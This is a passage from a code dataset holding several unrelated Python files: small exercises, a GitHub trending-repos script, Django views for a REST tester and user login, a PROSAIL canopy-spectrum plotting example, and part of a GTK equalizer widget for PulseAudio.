EVEN_NUMS += 1\n else:\n ODD_NUMS += 1\n return counting_req(a // 10)\n\n\nif __name__ == '__main__':\n A = int(input('Введите натуральное число:\\n'))\n counting_cycle(A)\n counting_req(A)\n","sub_path":"lesson_2/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"240227770","text":"import requests\nimport sys\nfrom datetime import datetime, timedelta\n\nGITHUB_SEARCH_REPOS = 'https://api.github.com/search/repositories'\n\n\ndef get_last_week_date():\n today = datetime.today()\n today = datetime.date(today)\n last_week = today - timedelta(days=7)\n last_week = last_week.isoformat()\n 
return last_week\n\n\ndef get_trending_repositories(top_size):\n last_week = get_last_week_date()\n params = {'q': 'created:>{0}'.format(last_week),\n 'sort': 'stars',\n 'per_page': top_size}\n request = requests.get(GITHUB_SEARCH_REPOS, params=params)\n trending_repos = request.json()\n return trending_repos.get('items')\n\n\ndef output_interesting_repositories(trending_repos, top_size):\n print('\\nTop {0} trending repos ordered by stars:\\n'.format(top_size))\n for repo in trending_repos:\n print('{0} \\nDescription: {1}'.format(repo.get('name'), repo.get('description')))\n print('Stars: {0} \\nOpen issues: {1}'.format(repo.get('stargazers_count'), repo.get('open_issues_count')))\n print('Link: {0} \\n'.format(repo.get('html_url')))\n\n\nif __name__ == '__main__':\n try:\n top_size = int(sys.argv[1])\n except:\n top_size = 100\n list_trending_repos = get_trending_repositories(top_size)\n output_interesting_repositories(list_trending_repos, top_size)\n","sub_path":"github_trending.py","file_name":"github_trending.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"251194998","text":"class Solution:\n def minDistance(self, height, width, tree, squirrel, nuts):\n \"\"\"\n :type height: int\n :type width: int\n :type tree: List[int]\n :type squirrel: List[int]\n :type nuts: List[List[int]]\n :rtype: int\n \"\"\"\n def distance(x, y):\n return abs(x[0] - y[0]) + abs(x[1] - y[1])\n\n\n mindis, first = 999999999, 0\n for i, nut in enumerate(nuts):\n if distance(squirrel, nut) - distance(tree, nut) < mindis:\n mindis = distance(squirrel, nut) - distance(tree, nut)\n first = i\n\n ans = mindis + sum(2 * distance(tree, nut) for i, nut in enumerate(nuts))\n return ans\n","sub_path":"leetcode/573. Squirrel Simulation.py","file_name":"573. 
Squirrel Simulation.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"217600602","text":"from google.appengine.api import users\nfrom google.appengine.api import channel\n\nimport json\nimport webapp2\nfrom random import randint\n\n\nclass checkCredentials(webapp2.RequestHandler):\n def get(self):\n \n tokensalt = randint(1561, 8644242454)\n mytoken = 'ebiduh' + str(tokensalt)\n token = channel.create_channel(mytoken)\n data = { 'token':token, 'clientID':mytoken }\n self.response.out.write(json.dumps(data))\n \n \nclass doNothing(webapp2.RequestHandler):\n def get(self):\n self.response.out.write('successfully did nothing...')\n \n \n \n\n\napp = webapp2.WSGIApplication([\n ('/app/authenticate', checkCredentials),\n ('/app/donothing', doNothing),\n ],debug=True) ","sub_path":"app/authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"213776907","text":"from django.forms.models import modelformset_factory\nimport requests\nimport json\n\nfrom django.shortcuts import render\nfrom django.http.response import HttpResponse\nfrom django.forms.formsets import formset_factory\n\nfrom forms import TestRESTForm, TYPE_REQUEST_CHOICES, AddUsersForm\nfrom models import MyUser\n\n\ndef requests_view(request):\n if request.method == 'GET':\n context = {}\n context['form'] = TestRESTForm()\n return render(request, 'rest_app/index.html', context)\n\n elif request.method == 'POST':\n form = TestRESTForm(request.POST)\n context = {}\n info = ''\n if form.is_valid():\n type_request = dict(TYPE_REQUEST_CHOICES).get(int(request.POST.get('type_request')))\n if type_request == 'GET':\n try:\n info = requests.get(request.POST.get('request')).content\n info = json.loads(info)\n info = json.dumps(info, indent=4, sort_keys=True)\n except:\n info = 'Please try 
again'\n elif type_request == 'POST':\n try:\n if request.POST.get('request').count('?') == 1:\n url, data = request.POST.get('request').split('?')\n data = json.loads(data)\n headers = {'content-type': 'application/json'}\n info = requests.post(url, data=json.dumps(data), headers=headers)\n if str(info) == '':\n info = 'data is changed'\n else:\n info = 'Please try again'\n except:\n info = 'Please try again'\n elif type_request == 'DELETE':\n try:\n url = request.POST.get('request')\n info = requests.delete(url=url)\n if str(info) == '':\n info = 'ID does not exist'\n else:\n info = 'Record is deleted'\n except:\n info = 'Please try again'\n context['info'] = info\n\n context['form'] = form\n data = json.dumps({'info': info, 'errors': str(form.errors)})\n return HttpResponse(data, content_type=\"application/json\")\n\n\ndef add_users_view(request):\n if request.method == 'GET':\n context = {}\n context['form'] = formset_factory(AddUsersForm, extra=5)\n return render(request, 'rest_app/add_users.html', context)\n\n elif request.method == 'POST':\n context = {}\n AddUsersFormset = modelformset_factory(MyUser, form=AddUsersForm, extra=5)\n formset = AddUsersFormset(request.POST)\n if formset.is_valid():\n formset.save()\n context['form'] = formset_factory(AddUsersForm, extra=5)\n return render(request, 'rest_app/add_users.html', context)\n\n","sub_path":"rest_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"382088905","text":"# Import the model class\n# This is just to show how the module works\n\nfrom prosail2 import Prosail\nimport pdb\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom BRDF import est_spec\nimport cProfile\nimport matplotlib.colors as mcolors\n\ndef main():\n #pdb.set_trace()\n # nothing happens, but it gives access to stuff\n p = Prosail()\n wvs = p.wl\n# #def run(self, N, Cab, Car, Cbrown, Cw, Cm, LAI, 
psoil, hspot, tts, tto, psi, LIDF, outname=None, Py6S=False):\n \n # Common leaf distributions\n Planophile = (1, 0)\n Erectophile = (-1, 0)\n Plagiophile = (0, -1)\n Extremophile = (0, 1)\n Spherical = (-0.35, -0.15)\n \n # psi is the relative azimuth angle\n cnf_template = {'N': 1.5, 'Cab': 40, 'Car': 8, 'Cbrown': 0, 'Cw': 0.01, \\\n 'Cm': 0.009, 'LAI': 3, 'psoil': 0, 'hspot': 0.5, 'tts': 45, 'tto':1, 'psi':30, 'LIDF': Planophile}\n \n cnf_template = {'N': 2.0, 'Cab': 50, 'Car': 10, 'Cbrown': 0.1, 'Cw': 0.02, \\\n 'Cm': 0.015, 'LAI': 5, 'psoil': 0.3, 'hspot': 0.8, 'tts': 30, 'tto': 2, 'psi': 45, 'LIDF': 'Erectophile'}\n \n cnf_template = {'N': 1.5, 'Cab': 45, 'Car': 15, 'Cbrown': 0.2, 'Cw': 0.03, \\\n 'Cm': 0.02, 'LAI': 2, 'psoil': 0.2, 'hspot': 0.5, 'tts': 40, 'tto': 1, 'psi': 60, 'LIDF': 'Spherical'}\n \n cnf_template_corn = {'N': 1.5, 'Cab': 45, 'Car': 8, 'Cbrown': 0.2, 'Cw': 0.03, \\\n 'Cm': 0.02, 'LAI': 2, 'psoil': 0.2, 'hspot': 0.1, 'tts': 45, 'tto': 30, \\\n 'psi': 60, 'LIDFa': Erectophile[0], 'LIDFb': Erectophile[1]}\n\n\n #spc = p.run(cnf_template_corn)\n #spc = p.run(cnf_template)\n #plt.plot(p.wl, spc, label='Corn')\n #plt.savefig('img.jpg')\n \n\n # produce a bunch of different Cab levels:\n # Define colormap\n\n\n ##### CHLOROPHIL\n colors = ['#D2B48C', '#90EE90', '#008000', '#006400']\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', colors)\n\n # Create a list of Cab values\n Cab_values = np.arange(20, 100, 7.5)\n\n for i, Cab in enumerate(Cab_values):\n color=cmap(i / (len(np.arange(20, 100, 10)) - 1))\n cnf_template_corn['Cab'] = Cab\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, label=\"Cab = {}\".format(Cab), color=color)\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cab_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cab')\n\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('img.jpg')\n 
#pdb.set_trace()\n\n plt.figure()\n # Define the custom colormap\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#964B00', '#00BFFF'])\n\n\n ##### Liquid Water\n # Create a list of Cw values\n Cw_values = np.arange(0.01, 0.1, 0.01)\n\n # Iterate over Cw values\n for i, Cw in enumerate(Cw_values):\n cnf_template_corn['Cw'] = Cw\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(Cw_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cw_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cw')\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('Cw.jpg')\n #pdb.set_trace()\n\n\n ###### BROWN PIGMENT\n plt.figure()\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#008000', '#A52A2A'])\n # Create a list of Cw values\n Cbrown_values = np.arange(0.01, 1, 0.05)\n\n # Iterate over Cw values\n for i, Cbrown in enumerate(Cbrown_values):\n cnf_template_corn['Cbrown'] = Cbrown\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(Cbrown_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(Cbrown_values)\n cbar = plt.colorbar(sm)\n cbar.set_label('Cbrown')\n plt.ylim((0, 0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('Cbrown.jpg')\n #pdb.set_trace()\n\n #### LAI\n plt.figure()\n cmap = mcolors.LinearSegmentedColormap.from_list('custom_colormap', ['#00FF00', '#006400'])\n\n # Create a list of Cw values\n LAI_values = np.arange(1, 10, 0.5)\n\n # Iterate over Cw values\n for i, LAI in enumerate(LAI_values):\n cnf_template_corn['LAI'] = LAI\n spc = p.run(cnf_template_corn)\n plt.plot(p.wl, spc, color=cmap(i / (len(LAI_values) - 1)))\n\n # Create a colorbar\n sm = plt.cm.ScalarMappable(cmap=cmap)\n sm.set_array(LAI_values)\n cbar = plt.colorbar(sm)\n 
cbar.set_label('LAI')\n plt.ylim((0,0.3))\n plt.grid()\n plt.xlabel('Wavelengths (nm)')\n plt.ylabel('HDRF')\n #plt.title('Spectrum Plot')\n plt.savefig('LAI.jpg')\n print('done')\n pdb.set_trace()\n\n\n\n\n results = []\n for lidf, typename in zip([Planophile, Erectophile, Plagiophile, Extremophile, Spherical], ['Planophile', 'Erectophile', 'Plagiophile', 'Extremophile', 'Spherical']):\n cnf_template['LIDF'] = lidf\n spc = p.run(cnf_template)\n plt.plot(p.wl, spc, label=typename)\n results.append(spc)\n \n\n # get a single output:\n #profiler = cProfile.Profile()\n #profiler.enable()\n results1 = p.run(cnf_template)\n #profiler.disable()\n #profiler.print_stats()\n #p.run(1.5, 40, 8, 0, 0.01, 0.009, 1, 3, 0.01, 30, 10, 10, p.Planophile)\n #profile_result = cProfile.run('runit()', globals(), locals())\n #print(\"Method return value:\", profile_result)\n pdb.set_trace()\n \n cnf = cnf_template.copy()\n \n var_name = 'N'\n var_range = list(np.arange(0, 5, 0.1))\n #tto_range = list(np.arange(0, 20))\n results = []\n for val in var_range:\n cnf[var_name] = val\n print(cnf[var_name])\n results.append(p.run(cnf))\n\n\n wvs = p.wl\n results = np.array(results).T\n #cnfs = [cnf.update(tts=value) for value in np.arange(30, 60)]\n #plt.plot(wvs, results); plt.show()\n pdb.set_trace()\n try_rho = results[:, 0]\n brdf_adj = est_spec(try_rho, 2, 30, 5, 30, 50, 10)\n plt.plot(wvs, try_rho, wvs, brdf_adj); plt.show()\n #results = p.run(cnf)\n print(results)\n\n # Results ready for use with Py6S\n #results2 = p.run(1.5, 40, 8, 0, 0.01, 0.009, 1, 3, 0.01, 30, 10, 10, p.Planophile, Py6S=True)\n #print(results2)\n pdb.set_trace()\n\n # Use these results with Py6S by running something like:\n # s = SixS()\n # s.ground_reflectance = GroundReflectance.HomogeneousLambertian(results2)\n # s.run()\n\n\ndef runit(p):\n Planophile = (1, 0)\n cnf_template = {'N': 1.5, 'Cab': 40, 'Car': 8, 'Cbrown': 0, 'Cw': 0.01, \\\n 'Cm': 0.009, 'LAI': 1, 'psoil': 3, 'hspot': 0.01, 'tts': 30, 'tto':10, 
'psi':10, 'LIDF': Planophile}\n return p.run(cnf_template)\n\n\ndef plotspc(results):\n plt.plot(results[:,0], results[:,1])\n return 1\n\n\n \n return wvs\n\nif __name__=='__main__': main()","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"408731460","text":"\"\"\"这个例子将展示如何使用AODE分类器.\"\"\"\nimport pandas as pd\nimport classicML as cml\n\nDATASET_PATH = './datasets/西瓜数据集.csv'\nATTRIBUTE_NAME = ['脐部', '色泽', '根蒂', '敲声', '纹理', '触感', '密度', '含糖率']\n\n# 读取��据\ndataframe = pd.read_csv(DATASET_PATH, index_col=0, header=0)\nx = dataframe.iloc[:, :-1]\ny = dataframe.iloc[:, -1].values\ny[y == '是'] = 1\ny[y == '否'] = 0\n# 生成模型\nmodel = cml.AODE(attribute_name=ATTRIBUTE_NAME)\nmodel.compile(smoothing=True)\n# 训练模型\nmodel.fit(x, y)","sub_path":"examples/aode.py","file_name":"aode.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"640935044","text":"test_case = 1\nwhile True:\n dump = input()\n if not dump:\n break\n dump = int(dump)\n wall = list(map(int,input().split()))\n\n for _ in range(dump):\n wall.sort()\n wall[0] += 1\n wall[-1] -= 1\n print(f\"#{test_case} {wall[-1]-wall[0]}\")\n test_case += 1","sub_path":"python_workspace/coding_test/sw_expert_academy/Flatten.py","file_name":"Flatten.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457539271","text":"from django.http import HttpResponse\r\nfrom django.shortcuts import render\r\nfrom navigation.models import Category\r\nfrom navigation.models import Page\r\nfrom navigation.forms import UserForm, UserProfileForm\r\nfrom django.shortcuts import redirect, reverse\r\nfrom django.contrib.auth import authenticate, login\r\nfrom django.contrib.auth.decorators import 
login_required\r\nfrom django.contrib.auth import logout\r\n\r\nfrom datetime import datetime\r\n\r\ndef index(request):\r\n # 查询数据库,获取目前存储的所有分类\r\n # 按点赞次数倒序排列分类\r\n # 获取前 5 个分类(如果分类数少于 5 个,那就获取全部)\r\n # 把分类列表放入 context_dict 字典\r\n # 稍后传给模板引擎\r\n category_list = Category.objects.order_by('-likes')[:5]\r\n context_dict = {'categories': category_list}\r\n # 渲染响应,发给客户端\r\n page_list = Page.objects.order_by('-views')[:5]\r\n context_dict[\"pages\"] = page_list\r\n response = render(request, 'navigation/index.html', context_dict)\r\n # 调用处理 cookie 的辅助函数\r\n visitor_cookie_handler(request, response)\r\n # 返回 response 对象,更新目标 cookie\r\n return response\r\n\r\ndef about(request):\r\n #return HttpResponse(\"龙腾测试!!! 首页\")\r\n return render(request, 'navigation/about.html')\r\n\r\n@login_required\r\ndef show_category(request, category_name_slug):\r\n # 创建上下文字典,稍后传给模板渲染引擎\r\n context_dict = {}\r\n try:\r\n # 能通过传入的分类别名找到对应的分类吗?\r\n # 如果找不到, .get() 方法抛出 DoesNotExist 异常\r\n # 因此 .get() 方法返回一个模型实例或抛出异常\r\n category = Category.objects.get(slug=category_name_slug)\r\n # 检索关联的所有网页\r\n # 注意, filter() 返回一个网页对象列表或空列表\r\n pages = Page.objects.filter(category=category)\r\n # 把得到的列表赋值给模板上下文中名为 pages 的键\r\n context_dict['pages'] = pages\r\n # 也把从数据库中获取的 category 对象添加到上下文字典中\r\n # 我们将在模板中通过这个变量确认分类是否存在\r\n context_dict['category'] = category\r\n except Category.DoesNotExist:\r\n # 没找到指定的分类时执行这里\r\n # 什么也不做\r\n # 模板会显示消息,指明分类不存在\r\n context_dict['category'] = None\r\n context_dict['pages'] = None\r\n # 渲染响应,返回给客户端\r\n return render(request, 'navigation/category.html', context_dict)\r\n\r\ndef register(request):\r\n # 一个布尔值,告诉模板注册是否成功\r\n # 一开始设为 False,注册成功后改为 True\r\n registered = False\r\n # 如果是 HTTP POST 请求,处理表单数据\r\n if request.method == 'POST':\r\n # 尝试获取原始表单数据\r\n # 注意, UserForm 和 UserProfileForm 中的数据都需要\r\n user_form = UserForm(data=request.POST)\r\n profile_form = UserProfileForm(data=request.POST)\r\n # 如果两个表单中的数据是有效的……\r\n if user_form.is_valid() and profile_form.is_valid():\r\n # 
把 UserForm 中的数据存入数据库\r\n user = user_form.save()\r\n # 使用 set_password 方法计算密码哈希值\r\n # 然后更新 user 对象\r\n user.set_password(user.password)\r\n user.save()\r\n # 现在处理 UserProfile 实例\r\n # 因为要自行处理 user 属性,所以设定 commit=False\r\n # 延迟保存模型,以防出现完整性问题\r\n profile = profile_form.save(commit=False)\r\n profile.user = user\r\n # 用户提供头像了吗?\r\n # 如果提供了,��表单数据库中提取出来,赋给 UserProfile 模型\r\n if 'picture' in request.FILES:\r\n profile.picture = request.FILES['picture']\r\n # 保存 UserProfile 模型实例\r\n profile.save()\r\n # 更新变量的值,告诉模板成功注册了\r\n registered = True\r\n else:\r\n # 表单数据无效,出错了\r\n # 在终端打印问题\r\n print(user_form.errors, profile_form.errors)\r\n else:\r\n # 不是 HTTP POST 请求,渲染两个 ModelForm 实例\r\n # 表单为空,待用户填写\r\n user_form = UserForm()\r\n profile_form = UserProfileForm()\r\n # 根据上下文渲染模板\r\n return render(request,\r\n 'navigation/register.html',\r\n {'user_form': user_form,\r\n 'profile_form': profile_form,\r\n 'registered': registered})\r\n \r\n\r\ndef user_login(request):\r\n # 如果是 HTTP POST 请求,尝试提取相关信息\r\n if request.method == 'POST':\r\n # 获取用户在登录表单中输入的用户名和密码\r\n # 我们使用的是 request.POST.get('')\r\n # 而不是 request.POST['']\r\n # 这是因为对应的值不存在时,前者返回 None,\r\n # 而后者抛出 KeyError 异常\r\n username = request.POST.get('username')\r\n password = request.POST.get('password')\r\n # 使用 Django 提供的函数检查 username/password 是否有效\r\n # 如果有效,返回一个 User 对象\r\n user = authenticate(username=username, password=password)\r\n # 如果得到了 User 对象,说明用户输入的凭据是对的\r\n # 如果是 None( Python 表示没有值的方式),说明没找到与凭据匹配的用户\r\n if user:\r\n # 账户激活了吗?可能被禁了\r\n if user.is_active:\r\n # 登入有效且已激活的账户\r\n # 然后重定向到首页\r\n login(request, user)\r\n return redirect(reverse('index'))\r\n else:\r\n # 账户未激活,禁止登录\r\n return HttpResponse(\"Your Rango account is disabled.\")\r\n else:\r\n # 提供的登录凭据有问题,不能登录\r\n print(\"Invalid login details: {0}, {1}\".format(username, password))\r\n return HttpResponse(\"Invalid login details supplied.\")\r\n # 不是 HTTP POST 请求,显示登录表单\r\n # 极有可能是 HTTP GET 请求\r\n else:\r\n # 没什么上下文变量要传给模板系统\r\n # 因此传入一个空字典\r\n return 
render(request, 'navigation/login.html', {})\r\n\r\n# 使用 login_required() 装饰器限制\r\n# 只有已登录的用户才能访问这个视图\r\n@login_required\r\ndef user_logout(request):\r\n # 可以确定用户已登录,因此直接退出\r\n logout(request)\r\n # 把用户带回首页\r\n return redirect(reverse('index'))\r\n\r\n\r\ndef visitor_cookie_handler(request, response):\r\n # 获取网站的访问次数\r\n # 使用 COOKIES.get() 函数读取“visits”cookie\r\n # 如果目标 cookie 存在,把值转换为整数\r\n # 如果目标 cookie 不存在,返回默认值 1\r\n visits = int(request.COOKIES.get('visits', '1'))\r\n last_visit_cookie = request.COOKIES.get('last_visit', str(datetime.now()))\r\n last_visit_time = datetime.strptime(last_visit_cookie[:-7],'%Y-%m-%d %H:%M:%S')\r\n # 如果距上次访问已超过1s……\r\n if (datetime.now() - last_visit_time).seconds > 0:\r\n visits = visits + 1\r\n # 增加访问次数后更新“last_visit”cookie\r\n response.set_cookie('last_visit', str(datetime.now()))\r\n else:\r\n # 设定“last_visit”cookie\r\n response.set_cookie('last_visit', last_visit_cookie)\r\n # 更新或设定“visits”cookie\r\n response.set_cookie('visits', visits)","sub_path":"Chapter-08-code/first_project/navigation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"99775303","text":"#!/usr/bin/env python\n#\n# gpaeq: GTK EQ editor for PulseAudio's EQ plugin\n# Copyright (C) 2014 Philippe Proulx \n#\n# D-bus communication and EQ computations inspired by Jason Newton's qpaeq; see\n# .\n# Copyright (C) 2009 Jason Newton \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU Affero General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU Affero General Public License for more details.\n#\n# You should have received a copy of the GNU Affero General Public License\n# along with this program. If not, see .\n\n\nfrom gi.repository import Gtk\nfrom gi.repository import Gdk\nfrom gi.overrides import Pango\nimport signal\nimport cairo\n\n\nclass SliderModel:\n def __init__(self, label, value, on_change):\n self._label = label\n self._value = value\n self._on_change = on_change\n self._scroll_incr = 0.01\n\n def set_label(self, label):\n self._label = label\n\n def get_label(self):\n return self._label\n\n def set_value(self, value):\n self._value = value\n if self._on_change:\n self._on_change()\n\n def set_scroll_incr(self, incr):\n self._scroll_incr = incr\n\n def get_scroll_incr(self):\n return self._scroll_incr\n\n def format_label(self):\n return self.get_label()\n\n def format_value(self):\n return '{:03}'.format(round(self.get_value() * 100))\n\n def get_value(self):\n return self._value\n\n def get_mid(self):\n return 0.5\n\n\nclass EqDbSliderModel(SliderModel):\n def __init__(self, hz, db_value, mindb, maxdb, on_change):\n self._mindb = mindb\n self._maxdb = maxdb\n self._hz = hz\n self._mid = EqDbSliderModel._db_value_to_value(0, mindb, maxdb)\n value = EqDbSliderModel._db_value_to_value(db_value, mindb, maxdb)\n SliderModel.__init__(self, str(hz), value, on_change)\n\n @staticmethod\n def _db_value_to_value(db_value, mindb, maxdb):\n return (db_value - mindb) / (maxdb - mindb)\n\n def get_db_value(self):\n return self.get_value() * (self._maxdb - self._mindb) + self._mindb\n\n def set_db_value(self, db_value):\n self.set_value(EqDbSliderModel._db_value_to_value(db_value, self._mindb, self._maxdb))\n\n def format_label(self):\n if self._hz < 1000:\n return str(int(self._hz))\n else:\n return '{:.1f}'.format(self._hz / 1000).rstrip('0').rstrip('.') + 'k'\n\n def format_value(self):\n db_value = self.get_db_value()\n ret = '{}{:.1f}'.format('+' if db_value >= 0 else '', db_value)\n 
return ret\n\n def get_mid(self):\n return self._mid\n\n\nclass Sliders(Gtk.DrawingArea):\n DEF_SLIDER_WIDTH = 35\n DEF_HANDLE_COLOR = (77 / 255, 224 / 255, 213 / 255)\n DEF_HANDLE_HOVER_COLOR = (214 / 255, 64 / 255, 72 / 255)\n DEF_SLIDER_BAR_COLOR = (0.35, 0.35, 0.35)\n DEF_SLIDER_BAR_HOVER_COLOR = (222 / 255, 96 / 255, 104 / 255)\n DEF_LABEL_COLOR = (0.8, 0.8, 0.8)\n DEF_VALUE_COLOR = (77 / 255, 224 / 255, 213 / 255)\n DEF_VERT_GUIDE_COLOR = (0.18, 0.18, 0.18)\n DEF_SLIDER_GUTTER = 2\n DEF_BORDER_WIDTH = 15\n INFO_HEIGHT = 27\n\n def __init__(self):\n self._pressed = False\n self._locked_x = None\n self._hover_slider_index = None\n self._sliders = []\n\n # default properties\n self._slider_width = Sliders.DEF_SLIDER_WIDTH\n self._handle_color = Sliders.DEF_HANDLE_COLOR\n self._handle_hover_color = Sliders.DEF_HANDLE_HOVER_COLOR\n self._slider_bar_color = Sliders.DEF_SLIDER_BAR_COLOR\n self._slider_bar_hover_color = Sliders.DEF_SLIDER_BAR_HOVER_COLOR\n self._slider_gutter = Sliders.DEF_SLIDER_GUTTER\n self._border_width = Sliders.DEF_BORDER_WIDTH\n self._label_color = Sliders.DEF_LABEL_COLOR\n self._value_color = Sliders.DEF_VALUE_COLOR\n self._vert_guide_color = Sliders.DEF_VERT_GUIDE_COLOR\n\n # precompute stuff\n self._precompute_stuff()\n\n # initialize drawing area\n Gtk.DrawingArea.__init__(self)\n\n # connect stuff\n self.add_events(Gdk.EventMask.BUTTON_PRESS_MASK)\n self.add_events(Gdk.EventMask.BUTTON_RELEASE_MASK)\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK)\n self.add_events(Gdk.EventMask.LEAVE_NOTIFY_MASK)\n self.add_events(Gdk.EventMask.ENTER_NOTIFY_MASK)\n self.add_events(Gdk.EventMask.POINTER_MOTION_MASK)\n self.add_events(Gdk.EventMask.SCROLL_MASK | Gdk.EventMask.SMOOTH_SCROLL_MASK)\n self.connect('draw', self._on_draw)\n self.connect('button-press-event', self._on_button_press)\n self.connect('button-release-event', self._on_button_release)\n self.connect('motion-notify-event', self._on_motion)\n self.connect('scroll-event', 
self._on_scroll)\n self.connect('enter-notify-event', self._on_enter)\n self.connect('leave-notify-event', self._on_leave)\n self.connect('configure-event', self._on_configure)\n\n def set_slider_width(self, width):\n if width < 1:\n raise RuntimeError('slider width < 1')\n self._slider_width = width\n self._precompute_stuff()\n self.queue_draw()\n\n def set_handle_color(self, color):\n self._handle_color = color\n self.queue_draw()\n\n def set_handle_hover_color(self, color):\n self._handle_hover_color = color\n self.queue_draw()\n\n def set_slider_bar_color(self, color):\n self._slider_bar_color = color\n self.queue_draw()\n\n def set_slider_bar_hover_color(self, color):\n self._slider_bar_hover_color = color\n self.queue_draw()\n\n def set_label_color(self, color):\n self._label_color = color\n self.queue_draw()\n\n def set_value_color(self, color):\n self._value_color = color\n self.queue_draw()\n\n def set_vert_guide_color(self, color):\n self._vert_guide_color = color\n self.queue_draw()\n\n def set_slider_gutter(self, gutter):\n if gutter < 0:\n raise RuntimeError('gutter width < 0')\n self._slider_gutter = gutter\n self._precompute_stuff()\n self.queue_draw()\n\n def set_border_width(self, width):\n if width < 0:\n raise RuntimeError('border width < 0')\n self._border_width = width\n self._precompute_stuff()\n self.queue_draw()\n\n def get_width_for_nb_sliders(self, nb):\n # width is: number of sliders * single slider width + borders\n return nb * self._slider_width + 2 * self._border_width\n\n def get_nb_fitting_sliders(self):\n alloc = self.get_allocation()\n width = alloc.width - 2 * self._border_width\n return width // self._slider_width\n\n def _get_size(self):\n # size allocated to me\n alloc = self.get_allocation()\n\n # width will depend on sliders in fact\n width = self._slider_width * len(self._sliders) + 2 * self._border_width\n height = (alloc.height // 2) * 2\n\n return width, height\n\n def _get_sliders_size(self):\n # total width/height\n 
width, height = self._get_size()\n\n # remove borders from width\n width -= 2 * self._border_width\n\n # remove borders from height\n height -= 2 * self._border_width\n\n # remove info from height\n height -= self._border_width\n height -= Sliders.INFO_HEIGHT\n\n return width, height\n\n def _get_slider_index_at_x(self, x):\n width, height = self._get_sliders_size()\n x = round(x)\n if x < 0 or x >= width:\n return None\n return x // self._slider_width\n\n def _get_slider_at_x(self, x):\n index = self._get_slider_index_at_x(x)\n return None if index is None else self._sliders[index]\n\n def set_sliders(self, sliders):\n self._sliders = sliders\n self.queue_draw()\n\n def _translate_xy(self, x, y):\n return x - self._border_width, y - self._border_width\n\n def _get_handle_width(self):\n return self._slider_width - self._slider_gutter\n\n def _get_handle_height(self):\n return round(self._get_handle_width() / 4)\n\n def _get_slider_bar_width(self):\n return round(self._get_handle_width() / 2)\n\n def _precompute_stuff(self):\n width, height = self._get_sliders_size()\n off = self._border_width\n hw = self._get_handle_width()\n hh = self._get_handle_height()\n self._handle_padding = round(hh / 2)\n self._mi = self._handle_padding + off\n self._ma = height - self._handle_padding + off\n self._mid = round((height / 2) + off)\n self._sbw = self._get_slider_bar_width()\n self._offset_sb = round((hw - self._sbw) / 2)\n\n def _draw_slider(self, cr, slider_index):\n # size\n width, height = self._get_sliders_size()\n\n # hover?\n is_hover = False\n if self._hover_slider_index is not None:\n is_hover = (slider_index == self._hover_slider_index)\n\n # colors\n hfg = self._handle_color\n hhfg = self._handle_hover_color\n sbg = self._slider_bar_color\n sbhg = self._slider_bar_hover_color\n lfg = self._label_color\n vfg = self._value_color\n vgfg = self._vert_guide_color\n\n # handle dimensions\n hw = self._get_handle_width()\n hh = self._get_handle_height()\n\n # get slider\n 
